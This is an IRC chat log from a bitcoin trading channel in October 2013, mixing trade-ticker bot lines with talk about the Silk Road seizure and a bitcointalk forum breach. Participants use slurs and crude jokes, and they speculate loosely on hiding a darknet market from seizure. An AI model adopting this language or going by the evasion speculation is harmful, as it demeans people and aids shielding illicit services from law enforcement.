9 pieces of counterfeit id. All 9 had photos of Ross Ulbricht with different names. Oct 02 22:43:19 Ulbricht posted on Stack Overflow using his real name, asking .How can I connect to a Tor hidden service using curl in php?.. One minute later he changed his username to .frosty., but a subpoena shows the original name. Oct 02 22:43:23 wow this guy was a pro Oct 02 22:43:51 dexX7 meanwhile over at bitbet, the potheads hope : Oct 02 22:43:52 http://bitbet.us/bet/542/the-fbi-were-had/ Oct 02 22:43:56 well the good news is that someone with the technical ability can replace him Oct 02 22:44:03 BitBet - The FBI were had. Oct 02 22:44:36 that is fast, that bet must be an inside job Oct 02 22:44:42 anyway, you can tell the wanna-be speculators that mp hath spoken, and their hopes were thereby crushed. Oct 02 22:45:00 mircea_popescu: awesome bet Oct 02 22:45:08 but somewhat too specific Oct 02 22:45:36 and it's Dread Oct 02 22:46:07 i for one am impressed a sr user can type at all. Oct 02 22:46:27 silk road isn't only for potheads. or drugs. Oct 02 22:46:41 also for crackheads and whores? Oct 02 22:47:01 and custom crapware, and spam, apparently Oct 02 22:47:07 someone give me 1700 coins and i'll give you a photo of a ketchup-covered body and some random numbers Oct 02 22:47:22 eh. I won't say what I wanted to buy on atlantis (and is still unavailable anywhere else) but it wasn't recreational drugs Oct 02 22:47:41 please, do tell. Oct 02 22:47:47 also for crackheads and whores? << dude you should ipo your humor. Oct 02 22:47:49 i'd buy some. Oct 02 22:48:03 :) Oct 02 22:48:06 lyspooner can it be a woman at least ? Oct 02 22:48:17 no, they're random! Oct 02 22:48:21 this is what i don't understand, these retards already. at the very least they could see some tits for once in their life. Oct 02 22:48:29 but... internet rats being fags... Oct 02 22:48:43 America was not shut down properly. Would you like to start America in safe mode, with free healthcare and without the guns? (Recommended) Oct 02 22:49:11 lmao Oct 02 22:49:40 sad part is they'd find some other way to implode Oct 02 22:50:01 you can't not implode if you don't work. Oct 02 22:50:25 [HAVELOCK] [HIM] 1 @ 0.143 BTC [-] Oct 02 22:50:33 Bugpowder how;s my luck going ? Oct 02 22:51:14 fix it,thank you mp Oct 02 22:52:05 yw. Oct 02 22:53:00 i'm still puzzling over the idiocy of that SR fellow. was he just tired of living? Oct 02 22:54:17 likely, he was just a kid playing. these forum folk, they can do anything, haven't you heard ? Oct 02 22:54:29 much less likely, he's about to rape the feds as per that bet. Oct 02 22:54:38 also, it would seem like the U.S. treasury now holds BTC? (if true) Oct 02 22:54:57 i doubt they have the passphrase. Oct 02 22:55:03 or maybe whichever cops had the keys to the evidence locker have divvied it up already Oct 02 22:55:19 besides... it will be cracked by some smart guy in the evidence room and emptied before the treasury gets it. Oct 02 22:55:23 eh, if that idiot was actually caught, he's probably spat out the key by now Oct 02 22:55:23 right. Oct 02 22:55:45 he'd have to be pretty retarded to give up the key lol. Oct 02 22:55:48 only thing he;'s got. Oct 02 22:55:58 "what are you going to do the next five years of your life?" DPR's response is here: http://youtu.be/Olib3jnvSmw?t=33m50s Oct 02 22:57:20 dude;s stoned to all fuck is he. Oct 02 22:57:42 amazing link. Oct 02 22:57:44 AMAZING COMPANY! Oct 02 22:59:23 https://images.4chan.org/g/src/1380733208310.png Oct 02 22:59:35 he's gonna start a family alrite Oct 02 22:59:40 makes you wonder what a sober man might've accomplished. Oct 02 22:59:42 he'll be the mommy Oct 02 22:59:57 asciilifeform indeed. Oct 02 23:00:35 i suspect we'd all benefit from much more stringent dope regulation. Oct 02 23:00:35 [HAVELOCK] [AM100] [PAID] 19.06535883 BTC to 250`761 shares, 7603 satoshi per share Oct 02 23:00:35 [BTCTC] [LABCOIN] 5000 @ 0.0001851 = 0.9255 BTC [-] Oct 02 23:00:50 wonder if they'll Ulbricht around in a cage like Yemelyan Pugachev. Oct 02 23:00:53 something along the lines of, shooting kids on the spot for the first pot offence. Oct 02 23:01:07 ;;ticker Oct 02 23:01:07 MtGox BTCUSD ticker | Best bid: 125.70001, Best ask: 126.01004, Bid-ask spread: 0.31003, Last trade: 126.01004, 24 hour volume: 96206.05570245, 24 hour low: 109.70000, 24 hour high: 141.94399, 24 hour vwap: 125.06223 Oct 02 23:02:02 protip: if dope has killed your potential, you didnt have any Oct 02 23:02:35 but its nice to have things to blame rite Oct 02 23:03:38 [HAVELOCK] [AM1] [PAID] 34.54254492 BTC to 4`316 shares, 800337 satoshi per share Oct 02 23:03:50 dub if you didn't have any why aren't you shot yet. Oct 02 23:04:27 stop trying to divide by 0 Oct 02 23:04:39 [HAVELOCK] [AM1] 1 @ 0.95000001 BTC [-] Oct 02 23:05:02 how short must that investigation have been? Oct 02 23:05:03 my spurious pseudoarguments ;/ Oct 02 23:05:09 $avg Oct 02 23:05:10 TAT_Investments: 118.22 Oct 02 23:05:16 ;;ticker Oct 02 23:05:17 MtGox BTCUSD ticker | Best bid: 126.00000, Best ask: 126.99997, Bid-ask spread: 0.99997, Last trade: 126.00000, 24 hour volume: 96263.22037264, 24 hour low: 109.70000, 24 hour high: 141.94399, 24 hour vwap: 125.06298 Oct 02 23:05:18 7 step investigation: Oct 02 23:05:27 1. find the first place where SR was mentioned Oct 02 23:05:35 ok, sorry it was only 1 step Oct 02 23:05:36 lyspooner http://trilema.com/2013/law-enforcement-never-fails-to-unintentionally-entertain-part-2/ Oct 02 23:06:41 [HAVELOCK] [B] [XBOND] 321 @ 0.00120211 = 0.3859 BTC [+] {2} Oct 02 23:07:21 "VIII. The other geek agrees to Internet-kill himself over the Internet for great Internet lulz&drama + justice" Oct 02 23:08:11 fact. Oct 02 23:09:59 like i said, give me 1700 coins and i'll send you that ladypic with ketchup Oct 02 23:10:48 the current going rate is about a quarter btc for inserting a satisfyingly thick writing implement in your anus Oct 02 23:10:56 i am testing my wallet..send me your coins and i will send them back..just make sure you tell me your address so i know who you are and if it was successful..ok Oct 02 23:10:58 proof Oct 02 23:11:08 ;;google really are buttcoins nao Oct 02 23:11:09 They really are Buttcoins nao pe Trilema - Un blog de Mircea Popescu.: ; Perfect money corrupts absolutely pe Trilema - Un blog de Mircea ...: ; Bitcoin pe Trilema - Un blog de Mircea Popescu.: Oct 02 23:11:46 the buttcoin went from 10 BTC to 0.25? Oct 02 23:12:05 it pays being the first. Oct 02 23:12:17 also, february btc. Oct 02 23:12:47 [HAVELOCK] [CBTC] 4972 @ 0.0002801 = 1.3927 BTC [-] Oct 02 23:12:56 mircea_popescu what's all that crap on the camera lens? Oct 02 23:13:16 i will allow you to guess. Oct 02 23:13:47 tears Oct 02 23:13:48 my own estimate is that this being a mirror in a bathroom in a house inhabited by that guy and similar bipedals Oct 02 23:13:53 it's probably old dry cum Oct 02 23:14:53 Ugh AM below 1 Oct 02 23:14:56 so that link with Rene Pinnell and Ross Ulbricht. i'm guessing that Rene guy is crapping his pants Oct 02 23:15:07 both those pics are very half assed Oct 02 23:15:12 I'm starting to wonder if the cat can still deliver Oct 02 23:15:13 lol Oct 02 23:15:22 San1ty_ on the basis of the price ? Oct 02 23:15:45 mircea_popescu, obv not Oct 02 23:15:47 that's no basis at all. it came to within the band indicated by the girl back when. it's where it should be. Oct 02 23:15:53 just shows that I'm not the only one thinking it Oct 02 23:16:18 it just shows you're not the only one not thinking would be my preferred format, but anyway. Oct 02 23:16:51 [MPEX] [S.MPOE] 850 @ 0.00091655 = 0.7791 BTC [-] {2} Oct 02 23:17:48 Haha, okay.. I'm not interested in price at all. Just the delays on the 500 gh's are kinda disappointing and the undecisiveness about second gen Oct 02 23:18:24 on the rumor mill they're all having sudden problems in china over the growing interest that govt is taking in wtf is mining. Oct 02 23:19:54 [HAVELOCK] [CFIG] 1 @ 0.141 BTC [+] Oct 02 23:20:58 anyone know how do I hide assbot ticker from this channel? Oct 02 23:21:05 /ignore assbot ALL Oct 02 23:21:24 with irssi, you can ignore on only one channel Oct 02 23:21:36 now I'm happy with just changing the color Oct 02 23:21:49 mircea_popescu: thank you. Oct 02 23:23:53 http://www.reddit.com/r/SilkRoad/comments/1nlt6d/sr_bust_finest_trollage/ Oct 02 23:23:54 SR bust == finest trollage? : SilkRoad Oct 02 23:24:24 clever Oct 02 23:25:04 any actual evidence for the troll hypothesis? Oct 02 23:25:11 the logo Oct 02 23:25:24 http://i.imgur.com/7jfZLgw.png Oct 02 23:25:33 http://www.aljazeera.com/news/asia-pacific/2013/10/new-evidence-n-korea-restarted-reactor-201310219416190275.html Oct 02 23:25:33 New evidence that N Korea restarted reactor - Asia-Pacific - Al Jazeera English Oct 02 23:25:53 that satellite is flying pretty low Oct 02 23:25:57 asciilifeform it was on the internet... Oct 02 23:26:00 [HAVELOCK] [CFIG] 2 @ 0.12 = 0.24 BTC [-] Oct 02 23:30:09 heh Oct 02 23:30:28 what are you going to do with those bitcoin things now? Oct 02 23:30:39 SR, the only thing bitcoins are for Oct 02 23:30:57 no, there is a brothel accepting bitcoin Oct 02 23:31:07 I like the implication that I'm regularly buying drugs on the internet Oct 02 23:32:06 [HAVELOCK] [AM100] 14 @ 0.01079999 = 0.1512 BTC [-] Oct 02 23:32:07 [BTCTC] [FN] [DMS.SELLING] 4284 @ 0.00494294 = 21.1756 BTC [-] {7} Oct 02 23:32:43 you mean bitcoin assets *aren't* drugs? Oct 02 23:32:48 oh crap, i'm out Oct 02 23:32:58 I regularly shoot up my bitcoins. Oct 02 23:34:08 [BTCTC] [FN] [DMS.PURCHASE] 29 @ 0.00515796 = 0.1496 BTC [-] {2} Oct 02 23:35:08 Was there a 'hidden site has been seized' notice when Freedom Hosting was taken down? Oct 02 23:35:09 [BTCTC] [FN] [BTC-GROWTH] 19 @ 0.082 = 1.558 BTC [-] Oct 02 23:35:09 [HAVELOCK] [AM1] 1 @ 1 BTC [+] Oct 02 23:35:49 I don't think so Oct 02 23:36:00 nope, just a driveby exploit. Oct 02 23:36:09 [BTCTC] [FN] [DMS.PURCHASE] 254 @ 0.005 = 1.27 BTC [-] Oct 02 23:37:10 [BTCTC] [FN] [DMS.SELLING] 109 @ 0.00492922 = 0.5373 BTC [-] {2} Oct 02 23:37:39 there was, yes. Oct 02 23:37:42 on the guy's main page. Oct 02 23:38:11 [MPEX] [S.MPOE] 1685 @ 0.00091996 = 1.5501 BTC [+] Oct 02 23:43:16 [BTCTC] [LABCOIN] 8745 @ 0.0001851 = 1.6187 BTC [-] Oct 02 23:43:16 [HAVELOCK] [AM100] 26 @ 0.00960001 = 0.2496 BTC [-] Oct 02 23:44:17 [HAVELOCK] [AM100] 89 @ 0.00960001 = 0.8544 BTC [-] Oct 02 23:46:19 [HAVELOCK] [AM100] 16 @ 0.01079999 = 0.1728 BTC [+] {3} Oct 02 23:50:23 [HAVELOCK] [B] [XBOND] 94 @ 0.001208 = 0.1136 BTC [+] Oct 02 23:53:31 http://www.aljazeera.com/news/middleeast/2013/10/rouhani-iran-us-relationship-angers-israel-2013102185832931333.html Oct 02 23:53:32 Rouhani: Iran-US relationship angers Israel - Middle East - Al Jazeera English Oct 02 23:53:46 obama should grow a beard Oct 02 23:54:02 and wear a towel Oct 02 23:54:27 [HAVELOCK] [AM100] 13 @ 0.01079999 = 0.1404 BTC [+] Oct 02 23:57:31 [BTCTC] [FN] [DMS.PURCHASE] 111 @ 0.0053 = 0.5883 BTC [+] Oct 02 23:58:31 [HAVELOCK] [AM100] 58 @ 0.00960001 = 0.5568 BTC [-] {2} Oct 02 23:58:43 I don't remember seeing the word "hidden" in this notice before Oct 02 23:59:14 does anyone remember it being there in the past? Oct 02 23:59:33 [HAVELOCK] [AM1] 12 @ 0.95625 = 11.475 BTC [-] {3} Oct 02 23:59:58 http://slashdot.org/topic/datacenter/former-nsa-honcho-calls-enterprise-security-appalling/ Oct 03 00:00:00 Former NSA Honcho Calls Enterprise Security 'Appalling' Oct 03 00:00:29 obvious statement needs stating Oct 03 00:00:34 [HAVELOCK] [AM1] 3 @ 0.953 = 2.859 BTC [-] Oct 03 00:00:48 As we look at the situation in the security arena. we see an awful lot of big companies . Fortune 100-level companies . with, to be perfectly candid, appalling security. They have fundamentally no idea what they.re doing, Oct 03 00:03:02 lol theres bets on this thing http://bitbet.us/bet/542/the-fbi-were-had/ Oct 03 00:03:17 shit tha matters. Oct 03 00:03:27 thanks to dexX7 trolling reddit Oct 03 00:03:32 also even odds Oct 03 00:03:37 [HAVELOCK] [AM1] 1 @ 0.95 BTC [-] Oct 03 00:03:56 how the fuck does that get resolved? Oct 03 00:04:28 the "dpr tried to hire a hitman" is fishy, though Oct 03 00:04:37 it looks like it wasn't even gpg signed! Oct 03 00:05:03 dub: as asual. by bribing bitbet staff Oct 03 00:05:27 I'm shocked that it even went down Oct 03 00:05:40 standard FBI MO would be to leave it running Oct 03 00:06:05 they left it running since july when they imaged it Oct 03 00:06:40 [BTCTC] [LABCOIN] 17000 @ 0.00018188 = 3.092 BTC [-] {6} Oct 03 00:07:34 I hope the server was encrypted… Oct 03 00:08:06 yup Oct 03 00:09:27 Diablo-D3: there are ways around that. like hosting it in a physically controlled location Oct 03 00:09:43 [BTCTC] [BTC-BOND] 200 @ 0.00962224 = 1.9244 BTC [-] {3} Oct 03 00:10:09 pankkake: so they'd image it by remote? Oct 03 00:10:34 you can read ram through walls? Oct 03 00:10:52 like physically secure? Oct 03 00:11:01 yes, that's what I meant Oct 03 00:11:02 then how'd they image it back in jul? Oct 03 00:11:30 oh, I mean that's what *should* be done - not what was done Oct 03 00:11:52 yeah, shit, what should've.. Oct 03 00:12:00 looks like I'm the only one competent and paranoid enough to run the new silk road. brb Oct 03 00:12:07 must be plenty of people sweating over unencrypted messages back and forth Oct 03 00:12:38 http://openpgpjs.org/ is useful to force even noobs to use gpg Oct 03 00:12:38 OpenPGP.js Oct 03 00:12:39 i would have thought dpr would be way the hell away from the US Oct 03 00:12:47 san francisco was a shock Oct 03 00:14:38 would this be the first occurrence of a tor site being taken down? Oct 03 00:15:05 freedom hosting was first Oct 03 00:15:20 so that was an .onion too, i didn't know Oct 03 00:15:26 then atlantis shut down by itself Oct 03 00:15:31 it was a hoster of .onions Oct 03 00:16:07 they can read ram through the power lines Oct 03 00:16:23 they could in the 80's Oct 03 00:16:55 technology has changed Oct 03 00:16:58 directly through the lines or from the waves coming off them? Oct 03 00:17:17 with trollvision glasses Oct 03 00:17:26 not xray specs? Oct 03 00:17:30 and even then, there are full-whatever UPSes that would probably kill it Oct 03 00:17:33 look at the waaaaves brah Oct 03 00:18:27 I have a buddy that designed a bunch of govt security shit Oct 03 00:19:04 chips for vpn? Oct 03 00:19:08 even back then all your peripherals, monitor, keyboard etc was hooked up opticaly Oct 03 00:19:58 CRT monitors were easy to spy on Oct 03 00:20:26 dub what do you mean optically? Oct 03 00:20:34 personal computers? Oct 03 00:20:37 you can cool down ram and move it to another location / machine and read it Oct 03 00:21:03 kako: freeze it's state? Oct 03 00:21:28 basically pc's Oct 03 00:21:58 trying to understand... how optical? keyboard for example. Oct 03 00:22:00 mjoiii this basically http://en.wikipedia.org/wiki/Cold_boot_attack Oct 03 00:22:08 mjoiii: fiber optics Oct 03 00:22:13 kakobrekla: yes, unless they're too late Oct 03 00:22:19 so you cant snarf the rf Oct 03 00:22:20 $20 webcam + motion = automated shutdown Oct 03 00:23:32 i was under impression they just subpoenaed colo provider and imaged the machine via network using some 0day Oct 03 00:24:02 they have a library of vulns? Oct 03 00:24:13 why not? Oct 03 00:24:17 there are black markets of vulnerabilities Oct 03 00:24:34 unfortunatley they have just taken it down! Oct 03 00:24:44 even smalltown pedo LE types have shit to sieze or image running machines Oct 03 00:24:58 [BTCTC] [LABCOIN] 45001 @ 0.0001813 = 8.1587 BTC [-] {2} Oct 03 00:25:07 well it's easy if it's a rented server Oct 03 00:25:34 if you rent the bay, maybe you can booby trap it Oct 03 00:25:41 wait, USG shuts down, SR shuts down... Oct 03 00:25:51 or simply, host at home. silk road wouldn't require that much bandwith Oct 03 00:25:59 [BTCTC] [LABCOIN] 15277 @ 0.0001812 = 2.7682 BTC [-] Oct 03 00:26:25 dub, man you're onto something Oct 03 00:26:35 pankkake, or host from internet cafe 150m away..just to be safe, yeah Oct 03 00:26:44 haha Oct 03 00:26:52 ikr, has anyone even seen a chemtrail this week? Oct 03 00:27:00 [HAVELOCK] [AM1] 4 @ 0.941 = 3.764 BTC [-] Oct 03 00:27:06 wouldn't the idea be to string the various tiers across multiple countries? Oct 03 00:27:18 also the global temps are down Oct 03 00:27:23 fuuu Oct 03 00:27:34 icecaps refreezing Oct 03 00:27:40 "idea be to string the various tiers across multiple countries"oh nobody does it, perhaps except me Oct 03 00:28:32 well, I'd certainly try to put multiple layers (hehe) of security Oct 03 00:28:46 the only layers seems to be political Oct 03 00:28:48 lazerz und bombs! Oct 03 00:28:49 I wonder if combining tor and i2p is doable Oct 03 00:28:55 i mean that can offer protection Oct 03 00:29:19 and then, the physical security Oct 03 00:29:29 no passwords, only physical tokens Oct 03 00:29:32 self-shutting down Oct 03 00:29:46 dead man switch Oct 03 00:30:00 female slaves in rack Oct 03 00:30:19 "oh man a mosquito rm -rfed my silk road for the third time this week!" Oct 03 00:31:07 eh, it's better to have 80% uptime that 0% eventually Oct 03 00:31:24 also, http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome works very well Oct 03 00:31:42 sufficiently paranoid sysadmin would never start something like sr Oct 03 00:31:43 I use it successfully with a crappy webcam Oct 03 00:31:43 well seems you are ready to rock Oct 03 00:31:49 just be sure to leave your gmail here first Oct 03 00:31:51 hehe Oct 03 00:32:01 from that follows we'll never have sufficiently secure sr-like service Oct 03 00:32:06 I never ordered from SR, I kept putting it off Oct 03 00:32:26 so I don't really have the experience to rewrite the thing Oct 03 00:33:06 [MPEX] [S.MPOE] 2253 @ 0.00092 = 2.0728 BTC [+] Oct 03 00:33:10 I guess a seller would be the most knowledgeable Oct 03 00:33:37 rewrite it to be distributed? Oct 03 00:34:01 i toyed with idea to hide small solar-powered computer in some place with public wifi Oct 03 00:34:05 that doesn't make much sense. who does the escrow? Oct 03 00:34:27 godammit Oct 03 00:34:37 but i don't really have an use for that Oct 03 00:34:42 can't be somehow shared amongst users? Oct 03 00:35:19 it would be easier to hide raspberry pis all over at places with free wifi, no one would ever see them Oct 03 00:35:21 jurov: I hope it will be common in the future. even as simple relays Oct 03 00:35:46 the hardest is to have both internet and power Oct 03 00:36:20 or there are public transport buses wit wifi running around.. just hack them for power somehow Oct 03 00:36:31 only need 5v Oct 03 00:36:44 a android phone charger Oct 03 00:36:45 but they have cameras inside so not trivial Oct 03 00:37:10 maybe light fixture can be quickly appropriated Oct 03 00:37:45 power line induction Oct 03 00:40:30 lol i remembered we were thinking here about installing clandestine miners to trolleybuses Oct 03 00:42:49 had plenty of people suggest hiding miners around the multitude of places I could Oct 03 00:46:39 got ~1.21 jiggaamps of 50vdc lying around Oct 03 00:47:02 but risk 6 figures for another 4 or low 5 Oct 03 00:47:07 nothx Oct 03 00:47:19 [HAVELOCK] [AM1] 2 @ 0.999 = 1.998 BTC [+] Oct 03 00:48:20 [HAVELOCK] [CBTC] 29976 @ 0.00027346 = 8.1972 BTC [-] {10} Oct 03 00:49:21 [HAVELOCK] [CBTC] 40025 @ 0.00025498 = 10.2056 BTC [-] {5} Oct 03 00:50:49 you're gonna get fired for plugging in your coffee warmer ? Oct 03 00:53:25 [BTCTC] [ASICMINER-PT] 5 @ 0.9755 = 4.8775 BTC [+] {2} Oct 03 00:55:27 [BTCTC] [ASICMINER-PT] 9 @ 1.026 = 9.234 BTC [+] Oct 03 00:57:29 [BTCTC] [ASICMINER-PT] 8 @ 1.027 = 8.216 BTC [+] Oct 03 01:06:41 I don't know why, but when I put bitcoin addresses in DuckDuckGo, I get sec.gov results **** BEGIN LOGGING AT Thu Oct 3 09:38:21 2013 Oct 03 09:40:06 [BTCTC] [BASIC-MINING] 50 @ 0.04345 = 2.1725 BTC [+] Oct 03 09:49:44 The consultant Oct 03 09:49:57 Diablo-D3: what do you even do where is the 1 billion dollar plan you were enacting Oct 03 09:50:04 /trolltrolltroll Oct 03 09:55:55 dude bitcoin was totally dependent on sr. har har. Oct 03 10:03:30 [BTCTC] [FN] [DMS.SELLING] 490 @ 0.005383 = 2.6377 BTC [+] Oct 03 10:05:32 [BTCTC] [FN] [DMS.SELLING] 31 @ 0.005384 = 0.1669 BTC [+] Oct 03 10:06:33 [BTCTC] [LABCOIN] 7400 @ 0.00020279 = 1.5006 BTC [+] {7} Oct 03 10:07:34 [BTCTC] [LABCOIN] 600 @ 0.0002185 = 0.1311 BTC [+] Oct 03 10:07:34 [BTCTC] [KENILWORTH] 170 @ 0.00135 = 0.2295 BTC [-] Oct 03 10:08:46 http://trilema.com/2013/smg-september-2013-statement/ Oct 03 10:08:47 S.MG, September 2013 Statement pe Trilema - Un blog de Mircea Popescu. Oct 03 10:14:41 [HAVELOCK] [AM100] 89 @ 0.0099 = 0.8811 BTC [+] Oct 03 11:12:38 [MPEX] [S.MPOE] 2800 @ 0.00092419 = 2.5877 BTC [-] {2} Oct 03 11:17:03 http://trilema.com/2013/i-was-right-you-were-wrong-again-feel-the-burn/ Oct 03 11:17:04 I was right, you were wrong. Again. Feel the burn. pe Trilema - Un blog de Mircea Popescu. Oct 03 11:27:54 [MPEX] [S.MPOE] 990 @ 0.00092443 = 0.9152 BTC [+] Oct 03 11:31:58 [BTCTC] [FN] [DMS.SELLING] 400 @ 0.005384 = 2.1536 BTC [+] Oct 03 11:35:42 o hey, retardstalk got owned ? Oct 03 11:37:01 that's the word on the street. Oct 03 11:37:46 i thought you had admin there ? wha happened ? Oct 03 11:38:07 who? me? no. Oct 03 11:38:47 a ok. Oct 03 11:39:00 weak avatar uploading script it seems. Oct 03 11:39:29 something like that. they were talking about it on reddit. Oct 03 11:40:56 .d Oct 03 11:41:04 148819199.80509 | Next Diff in 641 blocks | Estimated Change: 22.8042% in 3d 10h 25m 11s Oct 03 11:41:56 "Update: It's unfortunately worse than I thought. There's a good chance that the attacker(s) could have executed arbitrary PHP code and therefore could have accessed the database, but I'm not sure yet how difficult this would be. I'm sending out a mass mailing to all Forum users about this." Oct 03 11:41:58 herp. Oct 03 11:42:51 Figuring out the specifics is probably beyond my skills, so 50 BTC to the first person who tells me how this was done. (You have to convince me that your flaw was the one actually used.) The forum won't go back up until I know how this was done, so it could be down for a while. Oct 03 11:42:59 i hope they deleted the data and phantomcircuit was handling backups Oct 03 11:43:00 i guess this is for the best. Oct 03 11:47:17 i hope everything was salted Oct 03 11:47:59 passwords were apparently reasonably secure. nothing else obviously. i guess i'll get spam about buying btctalk pms now on top of everythinfg else. Oct 03 11:52:06 useless pricks Oct 03 11:52:39 funny thing is there was like what, 10k btc in the "donations to improve forum" stash Oct 03 11:56:45 https://ia601904.us.archive.org/1/items/gov.uscourts.mdd.238311/gov.uscourts.mdd.238311.4.0.pdf if i read this correctly, feds hooked DPR to ask for murder? Oct 03 11:58:02 jurov you saw original complaint ? Oct 03 11:58:03 Hello Oct 03 11:58:09 wow btc-talk offline? Oct 03 11:58:10 (the one this is superseeding) Oct 03 11:58:14 San1ty haxed. Oct 03 11:58:19 won't be back for a while. Oct 03 11:58:34 mircea_popescu: Wow, for a while? Not so easy to fix? Oct 03 11:58:35 yes and here it is said straightly that the UC (undercover capacity) sent him fake photo of the murder Oct 03 11:58:55 theymos is suspicious or something Oct 03 11:59:04 jurov o yeah ?! Oct 03 11:59:08 haha the plot thickens. Oct 03 11:59:26 i wonder why go about it in this strange manner. Oct 03 11:59:32 yes and here it is said straightly that the UC (undercover capacity) sent him fake photo of the murder // wtf Oct 03 12:00:03 Apocalyptic: https://ia601904.us.archive.org/1/items/gov.uscourts.mdd.238311/gov.uscourts.mdd.238311.4.0.pdf Oct 03 12:00:18 downloading now, seems farfetched to me Oct 03 12:00:36 so did the first guy that drafted the first ocmplaint not know about this ? Oct 03 12:00:36 hardly, they elaborate on whole process Oct 03 12:00:41 seems so Oct 03 12:00:43 as in, fbi AND dea were doing it ? Oct 03 12:00:45 haha poor guy. Oct 03 12:01:35 inception Oct 03 12:02:05 he's fucked, basically. he will ge consecutive life terms, and he'll serve it in the high security ward Oct 03 12:02:11 ie, with all the ACTUAL drug lords. Oct 03 12:02:37 no he wont Oct 03 12:02:46 he will cut a deal and snitch on everyone Oct 03 12:04:29 [HAVELOCK] [CBTC] 1000 @ 0.00028849 = 0.2885 BTC [+] Oct 03 12:05:36 http://trilema.com/2013/bitbet-september-2013-statement/ Oct 03 12:05:38 BitBet, September 2013 Statement pe Trilema - Un blog de Mircea Popescu. Oct 03 12:05:39 kakobrekla ^ Oct 03 12:05:44 VanCleef deal to what ? Oct 03 12:06:04 nah, im affraid they're making an example of him. Oct 03 12:06:14 remember that kid that killed himself over whatever downloads ? Oct 03 12:08:26 mircea_popescu and did you pay mpoe divs already? i saw nothing Oct 03 12:08:46 not yet no. Oct 03 12:09:43 it's getting done this week. Oct 03 12:10:35 did anyone already get a notification from TaT about their neobee transfer? Oct 03 12:10:35 [HAVELOCK] [B] [XBOND] 120 @ 0.001214 = 0.1457 BTC [+] Oct 03 12:10:44 jcpham Jezzz joesmoe joeykrim jordandotdev jurov Oct 03 12:11:05 nice find that indictment jurov. basically in the spring of 2013 silkroad was struggling to push 1kg of coke, Oct 03 12:11:13 to the degree they ended up buying it themselves. Oct 03 12:11:20 fucking ridiculous. Oct 03 12:13:39 [MPEX] [S.MPOE] 310 @ 0.00092443 = 0.2866 BTC [+] Oct 03 12:20:27 imagine if it comes out that large part of sr volume was between various TLAs Oct 03 12:20:49 seems likely at this point. Oct 03 12:21:00 fbi made > 100 purchases of dea stuff Oct 03 12:21:32 anyway, i updated my article from yest. the entire lulz angle isn't quite as adequate nao. Oct 03 12:23:59 holy shit HE WIRED MONEY Oct 03 12:24:03 omfg. Oct 03 12:24:27 this kid wired 40k usd to a capital one account in payment for a murder for hire to some guy he met on the internet Oct 03 12:25:02 i need the rest of the day off here. Oct 03 12:25:11 o;g Oct 03 12:25:16 unreal Oct 03 12:25:26 kid was a fucking joke Oct 03 12:26:22 lol Oct 03 12:33:59 [HAVELOCK] [AM1] 1 @ 0.95 BTC [-] Oct 03 12:41:06 [BTCTC] [ASICMINER-PT] 1 @ 0.9614 BTC [+] Oct 03 12:43:08 [BTCTC] [ASICMINER-PT] 4 @ 0.9613 = 3.8452 BTC [-] Oct 03 12:43:08 [BTCTC] [BASIC-MINING] 3 @ 0.04353 = 0.1306 BTC [+] Oct 03 12:46:11 [BTCTC] [LABCOIN] 2429 @ 0.00018705 = 0.4543 BTC [-] {2} Oct 03 12:47:12 [BTCTC] [LABCOIN] 7571 @ 0.00018248 = 1.3816 BTC [-] {4} Oct 03 13:01:27 [HAVELOCK] [B] [XBOND] 200 @ 0.00123499 = 0.247 BTC [+] {3} Oct 03 13:02:28 [HAVELOCK] [B] [XBOND] 884 @ 0.00126079 = 1.1145 BTC [+] {3} Oct 03 13:25:51 [MPEX] [S.MPOE] 2600 @ 0.00092762 = 2.4118 BTC [+] Oct 03 13:29:55 [HAVELOCK] [B] [XBOND] 707 @ 0.001217 = 0.8604 BTC [-] Oct 03 13:31:38 btctalk bounty still unclaimed? Oct 03 13:31:44 those guys are hillarious Oct 03 13:31:50 "special message from satoshi" -> http://www.youtube.com/watch?v=2meowzEwIdw Oct 03 13:42:06 [HAVELOCK] [AM100] 157 @ 0.01 = 1.57 BTC [+] {2} Oct 03 13:43:07 [HAVELOCK] [B] [XBOND] 667 @ 0.001217 = 0.8117 BTC [-] Oct 03 13:52:17 ;;bc,stats Oct 03 13:52:20 Current Blocks: 261454 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 625 blocks | Next Difficulty In About: 3 days, 5 hours, 19 minutes, and 10 seconds | Next Difficulty Estimate: 182871611.889 | Estimated Percent Change: 22.88173 Oct 03 14:03:28 [MPEX] [S.MPOE] 1900 @ 0.00092762 = 1.7625 BTC [+] Oct 03 14:11:36 [MPEX] [S.MPOE] 5100 @ 0.0009296 = 4.741 BTC [+] {3} Oct 03 14:43:08 [MPEX] [S.MPOE] 845 @ 0.0009305 = 0.7863 BTC [+] Oct 03 15:00:25 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 03 15:03:28 [MPEX] [S.MPOE] 5299 @ 0.00092762 = 4.9155 BTC [-] Oct 03 15:03:36 http://www.nbcnews.com/video/nbc-news/53166048/#53170418 Oct 03 15:03:39 Raw: Suspect beats up 75-year-old man - Video on NBCNews.com Oct 03 15:04:03 WTF ozbot? That's not the content. Oct 03 15:09:48 mircea_popescu why didn't the price crash like a motherfucker, what do you think? Oct 03 15:13:38 [HAVELOCK] [AM1] 1 @ 0.96 BTC [+] Oct 03 15:14:39 [MPEX] [S.MPOE] 4200 @ 0.0009305 = 3.9081 BTC [+] Oct 03 15:20:04 cause SR was <5% of the Bitcoin economy? Oct 03 15:21:17 80% of all bitcoin buying demand Oct 03 15:21:45 bitcointalk down? Oct 03 15:21:58 www.youtube.com/watch?v=3T-VYiTs34s << Oct 03 15:22:13 http://cryptolife.net/bitcointalk-hacked/ Oct 03 15:22:14 + http://www.reddit.com/r/Bitcoin/comments/1nmdq4/bitcointalk_hacked/ccjyjti Oct 03 15:23:00 lol dexX7 Oct 03 15:23:02 thx Oct 03 15:23:10 hehehe Oct 03 15:24:42 lol this vid Oct 03 15:39:03 [MPEX] [S.MPOE] 3700 @ 0.0009305 = 3.4429 BTC [+] Oct 03 15:48:12 [HAVELOCK] [AM1] 29 @ 0.91976963 = 26.6733 BTC [-] {10} Oct 03 16:03:11 lol Graet, the question is, how many times has it already happened? Oct 03 16:27:43 bitcointalk hacked? this is about the 3rd time i remember Oct 03 16:27:58 hi Oct 03 16:28:06 funny how a decentralised currency relies so heavily on 1 forum :P Oct 03 16:28:24 hey, there's reddit Oct 03 16:28:25 ;p Oct 03 16:28:53 